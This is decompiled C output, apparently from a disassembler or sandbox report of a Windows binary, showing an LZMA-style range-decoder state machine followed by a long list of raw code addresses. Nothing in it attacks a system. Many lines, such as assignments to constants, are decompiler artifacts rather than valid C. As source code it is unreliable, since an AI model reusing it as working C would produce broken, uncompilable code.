								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                                            0x00405f92
                                                                                                            0x00405f99
                                                                                                            0x00405f9f
                                                                                                            0x00405fa5
                                                                                                            0x00000000
                                                                                                            0x00405fa9
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fbe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x00000000
                                                                                                            0x00405fcb
                                                                                                            0x00405fcf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fd8
                                                                                                            0x00405fdb
                                                                                                            0x00405fde
                                                                                                            0x00405fe0
                                                                                                            0x00405fe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fe8
                                                                                                            0x00405feb
                                                                                                            0x00405fed
                                                                                                            0x00405fee
                                                                                                            0x00405ff1
                                                                                                            0x00405ff3
                                                                                                            0x00405ff4
                                                                                                            0x00405ff6
                                                                                                            0x00405ff9
                                                                                                            0x00405ffe
                                                                                                            0x00406003
                                                                                                            0x0040600c
                                                                                                            0x0040601f
                                                                                                            0x00406022
                                                                                                            0x0040602b
                                                                                                            0x0040602e
                                                                                                            0x00406056
                                                                                                            0x00406056
                                                                                                            0x00406058
                                                                                                            0x00406066
                                                                                                            0x00406066
                                                                                                            0x0040606a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x0040605a
                                                                                                            0x0040605d
                                                                                                            0x0040605d
                                                                                                            0x0040605e
                                                                                                            0x0040605e
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x00406030
                                                                                                            0x00406034
                                                                                                            0x00406039
                                                                                                            0x00406039
                                                                                                            0x00406042
                                                                                                            0x00406048
                                                                                                            0x0040604a
                                                                                                            0x0040604d
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406070
                                                                                                            0x00406070
                                                                                                            0x00406074
                                                                                                            0x00406920
                                                                                                            0x00000000
                                                                                                            0x00406920
                                                                                                            0x0040607d
                                                                                                            0x0040608d
                                                                                                            0x00406090
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406096
                                                                                                            0x00406096
                                                                                                            0x0040609a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040609c
                                                                                                            0x0040609f
                                                                                                            0x004060a2
                                                                                                            0x004060cc
                                                                                                            0x004060d2
                                                                                                            0x004060d9
                                                                                                            0x00000000
                                                                                                            0x004060d9
                                                                                                            0x004060a4
                                                                                                            0x004060a8
                                                                                                            0x004060ab
                                                                                                            0x004060b0
                                                                                                            0x004060b0
                                                                                                            0x004060bb
                                                                                                            0x004060c1
                                                                                                            0x004060c3
                                                                                                            0x004060c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040610b
                                                                                                            0x00406111
                                                                                                            0x00406114
                                                                                                            0x00406121
                                                                                                            0x00406129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004060e0
                                                                                                            0x004060e0
                                                                                                            0x004060e4
                                                                                                            0x0040692f
                                                                                                            0x00000000
                                                                                                            0x0040692f
                                                                                                            0x004060f0
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fe
                                                                                                            0x00406101
                                                                                                            0x00406104
                                                                                                            0x00406107
                                                                                                            0x00406109
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067af
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067e5
                                                                                                            0x004067ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067ee
                                                                                                            0x004067ee
                                                                                                            0x004067f2
                                                                                                            0x004069a1
                                                                                                            0x00000000
                                                                                                            0x004069a1
                                                                                                            0x004067fe
                                                                                                            0x00406805
                                                                                                            0x0040680d
                                                                                                            0x0040680d
                                                                                                            0x0040680d
                                                                                                            0x00406810
                                                                                                            0x00406813
                                                                                                            0x00406813
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406131
                                                                                                            0x00406133
                                                                                                            0x00406136
                                                                                                            0x004061a7
                                                                                                            0x004061aa
                                                                                                            0x004061ad
                                                                                                            0x004061b4
                                                                                                            0x004061be
                                                                                                            0x00000000
                                                                                                            0x004061be
                                                                                                            0x00406138
                                                                                                            0x0040613c
                                                                                                            0x0040613f
                                                                                                            0x00406141
                                                                                                            0x00406144
                                                                                                            0x00406147
                                                                                                            0x00406149
                                                                                                            0x0040614c
                                                                                                            0x0040614e
                                                                                                            0x00406153
                                                                                                            0x00406156
                                                                                                            0x00406159
                                                                                                            0x0040615d
                                                                                                            0x00406164
                                                                                                            0x00406167
                                                                                                            0x0040616e
                                                                                                            0x00406172
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x0040617e
                                                                                                            0x00406181
                                                                                                            0x0040619f
                                                                                                            0x004061a1
                                                                                                            0x00000000
                                                                                                            0x004061a1
                                                                                                            0x00406183
                                                                                                            0x00406186
                                                                                                            0x00406189
                                                                                                            0x0040618c
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x00406191
                                                                                                            0x00406194
                                                                                                            0x00406196
                                                                                                            0x00406197
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004063d0
                                                                                                            0x004063d4
                                                                                                            0x004063f2
                                                                                                            0x004063f5
                                                                                                            0x004063fc
                                                                                                            0x004063ff
                                                                                                            0x00406402
                                                                                                            0x00406405
                                                                                                            0x00406408
                                                                                                            0x0040640b
                                                                                                            0x0040640d
                                                                                                            0x00406414
                                                                                                            0x00406415
                                                                                                            0x00406417
                                                                                                            0x0040641a
                                                                                                            0x0040641d
                                                                                                            0x00406420
                                                                                                            0x00406420
                                                                                                            0x00406425
                                                                                                            0x00000000
                                                                                                            0x00406425
                                                                                                            0x004063d6
                                                                                                            0x004063d9
                                                                                                            0x004063dc
                                                                                                            0x004063e6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040643a
                                                                                                            0x0040643e
                                                                                                            0x00406461
                                                                                                            0x00406464
                                                                                                            0x00406467
                                                                                                            0x00406471
                                                                                                            0x00406440
                                                                                                            0x00406440
                                                                                                            0x00406443
                                                                                                            0x00406446
                                                                                                            0x00406449
                                                                                                            0x00406456
                                                                                                            0x00406459
                                                                                                            0x00406459
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040647d
                                                                                                            0x00406481
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406487
                                                                                                            0x0040648b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406491
                                                                                                            0x00406493
                                                                                                            0x00406497
                                                                                                            0x00406497
                                                                                                            0x0040649a
                                                                                                            0x0040649e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064ee
                                                                                                            0x004064f2
                                                                                                            0x004064f9
                                                                                                            0x004064fc
                                                                                                            0x004064ff
                                                                                                            0x00406509
                                                                                                            0x00000000
                                                                                                            0x00406509
                                                                                                            0x004064f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406515
                                                                                                            0x00406519
                                                                                                            0x00406520
                                                                                                            0x00406523
                                                                                                            0x00406526
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x00406529
                                                                                                            0x0040652c
                                                                                                            0x0040652f
                                                                                                            0x0040652f
                                                                                                            0x00406532
                                                                                                            0x00406535
                                                                                                            0x00406538
                                                                                                            0x00406538
                                                                                                            0x0040653b
